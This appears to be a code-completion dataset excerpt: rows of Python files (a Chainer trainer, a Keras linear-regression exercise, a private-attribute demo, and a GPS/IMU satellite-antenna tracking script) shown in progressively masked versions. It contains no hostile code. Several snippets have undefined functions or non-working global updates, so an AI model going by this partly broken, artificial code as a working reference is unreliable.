self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-5": "# -*- coding: utf-8 -*-\n\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\nclass SoftMaxTrainer():\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == \"Adam\":\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy',\n 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
# Exercise 1 - linear.py import numpy as np import keras # Build the model model = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])]) # Set the loss and optimizer function model.compile(optimizer='sgd', loss='mean_squared_error') # Initialize input data xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float) ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float) # Fit the model model.fit(xs, ys, epochs=500) # Prediction dataIn = np.array([10.0], dtype=float) print(model.predict(dataIn,1,1))
normal
{ "blob_id": "c8fecb6bfbd39e7a82294c9e0f9e5eaf659b7fed", "index": 1610, "step-1": "<mask token>\n", "step-2": "<mask token>\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\n<mask token>\nmodel.fit(xs, ys, epochs=500)\n<mask token>\nprint(model.predict(dataIn, 1, 1))\n", "step-3": "<mask token>\nmodel = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\nmodel.fit(xs, ys, epochs=500)\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn, 1, 1))\n", "step-4": "import numpy as np\nimport keras\nmodel = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\nmodel.fit(xs, ys, epochs=500)\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn, 1, 1))\n", "step-5": "# Exercise 1 - linear.py\nimport numpy as np\nimport keras\n# Build the model\nmodel = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])])\n# Set the loss and optimizer function\nmodel.compile(optimizer='sgd', loss='mean_squared_error')\n# Initialize input data\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)\n# Fit the model\nmodel.fit(xs, ys, epochs=500)\n# Prediction\ndataIn = np.array([10.0], dtype=float)\nprint(model.predict(dataIn,1,1))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
class Privacy: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') <|reserved_special_token_0|> <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') <|reserved_special_token_0|> print('Value not changable\n') value.__val <|reserved_special_token_1|> class Privacy: def __init__(self, val): self.__val = 900 print('Private data member =', self.__val, '\n') value = Privacy(800) print('Value not changable\n') value.__val <|reserved_special_token_1|> # defining private variables class Privacy: def __init__(self, val): self.__val = 900; print("Private data member =",self.__val,"\n") value = Privacy(800); print("Value not changable\n") value.__val;
flexible
{ "blob_id": "b767519229058b50183d78bb97121f050e5b6bad", "index": 423, "step-1": "class Privacy:\n <mask token>\n\n\n<mask token>\n", "step-2": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\n<mask token>\n", "step-3": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\n<mask token>\nprint('Value not changable\\n')\nvalue.__val\n", "step-4": "class Privacy:\n\n def __init__(self, val):\n self.__val = 900\n print('Private data member =', self.__val, '\\n')\n\n\nvalue = Privacy(800)\nprint('Value not changable\\n')\nvalue.__val\n", "step-5": "# defining private variables\r\nclass Privacy:\r\n def __init__(self, val):\r\n self.__val = 900; \r\n print(\"Private data member =\",self.__val,\"\\n\")\r\nvalue = Privacy(800);\r\nprint(\"Value not changable\\n\")\r\nvalue.__val;\r\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import time import ephem import serial import nmea import orientation import sys import threading from geomag import geomag #Constants initial_az = 180 initial_alt = 90 min_elevation = 10.0 sleep_time = 1.0 unwind_threshold = 180 sleep_on_unwind = 45.0 last_lon = '-88.787' last_lat = '41.355' last_heading = 0.0 mount_port = '/dev/ttyUSB0' arduino_port = '/dev/ttyACM0' class SerialTester: def write(self,line): print(line) def read(self, num): return class Antenna: azimuth = initial_az altitude = initial_alt parked = True def set_position(self, az, alt): self.azimuth = az self.altitude = alt az_int = round(az) alt_int = round(alt) ser.write(":Sz " + str(az_int) + "*00:00#") ser.write(":Sa +" + str(alt_int) + "*00:00#") ser.write(":MS#") ser.read(64) def park(self): if (self.parked): print('Antenna Parked') else: print('Parking Antenna') self.set_position(initial_az, initial_alt) self.parked = True def move(self, az, alt): if (self.parked): self.parked = False # Unwrap Cable if Azimuth will cross through True North # In the above case, Set Azimuth to 180 Degrees, then pick up # normal tracking # Then sleep 45 seconds to give the positioner time to # reposition if ((self.azimuth - az) > unwind_threshold): self.set_position(initial_az, self.altitude) print('Repositioning to unwrap cable') time.sleep(sleep_on_unwind) else: print('Tracking Mode') self.set_position(az, alt) def reset(): obs = ephem.Observer() #Set LAT/LON Coordinates to IMSA's location obs.date = ephem.now() obs.lon = last_lon obs.lat = last_lat obs.elevation = 0.0 return obs def update_gps(gprmc, obs): obsc = obs.copy() try: if gprmc.is_fixed() and gprmc.checksum(): datetime = gprmc.get_date() + " " + gprmc.get_time() obsc.date = datetime obsc.lat = str(gprmc.get_lat()) last_lat = str(gprmc.get_lat()) obsc.lon = str(gprmc.get_lon()) last_lon = str(gprmc.get_lon()) return obsc except: return obs def setup_serial(port, baud): # Set Serial Port - USB0 ser = serial.Serial(port, baud) print("Port used:" + ser.name) return ser # return SerialTester() def setup_satellite(): # Read in TLE for target satellite ICO F2 icof2 = ephem.readtle('ICO F2', '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997', '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058') return icof2 def to_degrees(radians): return radians / ephem.degree def get_sat_position(icof2, home): icof2.compute(home) icof2_az = to_degrees(icof2.az) icof2_alt = to_degrees(icof2.alt) print('Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' % (icof2_az, icof2_alt)) return icof2_az, icof2_alt def read_message(port): while True: try: line = port.readline().decode("ascii").replace('\r', '').replace('\n', '') except: line = "" if len(line) > 0 and line[0] == "$": return line def nmea_tester(sentence): mes = nmea.nmea(sentence) print("Checksum: ") print(mes.checksum()) print("Reformatted Date & Time: ") print(mes.get_date()) print(mes.get_time()) print("Lat, Lon: ") print(str(mes.get_lat()) + ", " + str(mes.get_lon())) print("Heading, MagVar") print(str(mes.get_magnetic_heading()) + ", " + str(mes.get_magnetic_var())) def arduino_tester(): ard = setup_serial(arduino_port, 115200) icof2 = setup_satellite() while True: try: line = read_nmea(ard) home = reset() home, heading = update(nmea.nmea(line)) print(home.lat) print(home.lon) print(home.date) print(heading) except: break def display_stats(orient, position, obs): try: print("\n"*65) magvar = get_magnetic_var(float(last_lat), float(last_lon)) print(''' _.:::::._ .:::'_|_':::. /::' --|-- '::\\ |:" .---"---. ':| |: ( O R E O ) :| |:: `-------' ::| \:::.......:::/ ':::::::::::' `'"""'`\n\n''') print("Time: {}\n".format(ephem.now())) print('GPS\n===\nFix: {fix}, Lat: {lat}, Lon: {lon}' .format(fix = position.is_fixed(), lat = obs.lat, lon = obs.lon)) print(position.unparsed) print("Sensor\n===") print('Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, '\ 'Roll: {roll:7.2f}\n---'.format(heading = orient.get_heading(), pitch = orient.get_pitch(), roll = orient.get_roll())) print('CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]},'\ ' Acc: {cal[2]}, Mag: {cal[3]}\n' .format(cal=orient.get_calibration())) print("\nMagnetic Declination: {magvar:7.2f}, " "Adjusted Heading: {true_heading:7.2f}" .format(magvar = magvar, true_heading= (orient.get_heading() + magvar+720)%360)) print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}' .format(bearing = position.get_bearing(), speed = position.get_speed())) except: pass def get_magnetic_var(lat, lon): gm = geomag.GeoMag() magobj = gm.GeoMag(lat, lon) return magobj.dec home = reset() ard = setup_serial(arduino_port, 115200) counter = time.time() f = open("logs/log_"+str(float(ephem.now()))+".csv", 'w') f.write("Epoch Time,Speed,Sensor,GPS,Waypoint\n") orient = orientation.orientation("$IMU,0,0,0,0,0,0,0,0,0") position = nmea.nmea("$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0") magvar = get_magnetic_var(float(last_lat), float(last_lon)) class myThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global val global ii val = '@' ii = '' while True: ii = input() if ii == "q": break val = chr(ord(val) + 1) pass thread1 = myThread() thread1.start() while True: mes = (read_message(ard)) if mes[:2] == "$G": try: position = nmea.nmea(mes) except: pass elif mes[:2] == "$I": try: orient = orientation.orientation(mes) except: pass # home.date = "2016-06-28 12:00:00" # Operate the antenna if the satellite's elevation is greater than 10 # degrees # If the elevation IS above 10 degrees and the antenna is parked, then # unlatch the park_latch variable home = update_gps(position, home) home.date = ephem.now() magvar = get_magnetic_var(float(last_lat), float(last_lon)) display_stats(orient, position, home) print(val) if time.time() - counter >= 1.0: counter = time.time() try: f.write(str(ephem.now())+",") f.write(str(position.get_speed())+",") f.write(str(orient.get_heading())+",") f.write(str(position.get_bearing())+",") f.write(val+"\n") except: f.write("x\n") if ii == "q": f.close() break ''' icof2_az, icof2_alt = get_sat_position(icof2, home) if (icof2_alt >= min_elevation): antenna.set_position(icof2_az - heading, icof2_alt) else: antenna.park()'''
normal
{ "blob_id": "468b5bd8d7b045ca8dd46c76a1829fc499e16950", "index": 5756, "step-1": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\n<mask token>\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\n<mask token>\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\n<mask token>\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\n<mask token>\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\n<mask token>\n\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + ' ' + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\ndef get_sat_position(icof2, home):\n icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print(\n 'Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' %\n (icof2_az, icof2_alt))\n return icof2_az, icof2_alt\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print('Checksum: ')\n print(mes.checksum())\n print('Reformatted Date & Time: ')\n print(mes.get_date())\n print(mes.get_time())\n print('Lat, Lon: ')\n print(str(mes.get_lat()) + ', ' + str(mes.get_lon()))\n print('Heading, MagVar')\n print(str(mes.get_magnetic_heading()) + ', ' + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n<mask token>\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\n<mask token>\n", "step-4": "import time\nimport ephem\nimport serial\nimport nmea\nimport orientation\nimport sys\nimport threading\nfrom geomag import geomag\ninitial_az = 180\ninitial_alt = 90\nmin_elevation = 10.0\nsleep_time = 1.0\nunwind_threshold = 180\nsleep_on_unwind = 45.0\nlast_lon = '-88.787'\nlast_lat = '41.355'\nlast_heading = 0.0\nmount_port = '/dev/ttyUSB0'\narduino_port = '/dev/ttyACM0'\n\n\nclass SerialTester:\n\n def write(self, line):\n print(line)\n\n def read(self, num):\n return\n\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(':Sz ' + str(az_int) + '*00:00#')\n ser.write(':Sa +' + str(alt_int) + '*00:00#')\n ser.write(':MS#')\n ser.read(64)\n\n def park(self):\n if self.parked:\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if self.parked:\n self.parked = False\n if self.azimuth - az > unwind_threshold:\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\n\ndef reset():\n obs = ephem.Observer()\n obs.date = ephem.now()\n obs.lon = last_lon\n obs.lat = last_lat\n obs.elevation = 0.0\n return obs\n\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + ' ' + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n ser = serial.Serial(port, baud)\n print('Port used:' + ser.name)\n return ser\n\n\ndef setup_satellite():\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997'\n ,\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058'\n )\n return icof2\n\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\n\ndef get_sat_position(icof2, home):\n icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print(\n 'Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' %\n (icof2_az, icof2_alt))\n return icof2_az, icof2_alt\n\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode('ascii').replace('\\r', '').replace(\n '\\n', '')\n except:\n line = ''\n if len(line) > 0 and line[0] == '$':\n return line\n\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print('Checksum: ')\n print(mes.checksum())\n print('Reformatted Date & Time: ')\n print(mes.get_date())\n print(mes.get_time())\n print('Lat, Lon: ')\n print(str(mes.get_lat()) + ', ' + str(mes.get_lon()))\n print('Heading, MagVar')\n print(str(mes.get_magnetic_heading()) + ', ' + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\n\ndef display_stats(orient, position, obs):\n try:\n print('\\n' * 65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(\n \"\"\" _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\\\:::.......:::/\n ':::::::::::'\n `'\"\"\\\"'`\n\n\"\"\"\n )\n print('Time: {}\\n'.format(ephem.now()))\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'.format(fix=\n position.is_fixed(), lat=obs.lat, lon=obs.lon))\n print(position.unparsed)\n print('Sensor\\n===')\n print(\n 'Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, Roll: {roll:7.2f}\\n---'\n .format(heading=orient.get_heading(), pitch=orient.get_pitch(),\n roll=orient.get_roll()))\n print(\n 'CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]}, Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\n '\\nMagnetic Declination: {magvar:7.2f}, Adjusted Heading: {true_heading:7.2f}'\n .format(magvar=magvar, true_heading=(orient.get_heading() +\n magvar + 720) % 360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'.format(bearing\n =position.get_bearing(), speed=position.get_speed()))\n except:\n pass\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\nhome = reset()\nard = setup_serial(arduino_port, 115200)\ncounter = time.time()\nf = open('logs/log_' + str(float(ephem.now())) + '.csv', 'w')\nf.write('Epoch Time,Speed,Sensor,GPS,Waypoint\\n')\norient = orientation.orientation('$IMU,0,0,0,0,0,0,0,0,0')\nposition = nmea.nmea('$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\nmagvar = get_magnetic_var(float(last_lat), float(last_lon))\n\n\nclass myThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == 'q':\n break\n val = chr(ord(val) + 1)\n pass\n\n\nthread1 = myThread()\nthread1.start()\nwhile True:\n mes = read_message(ard)\n if mes[:2] == '$G':\n try:\n position = nmea.nmea(mes)\n except:\n pass\n elif mes[:2] == '$I':\n try:\n orient = orientation.orientation(mes)\n except:\n 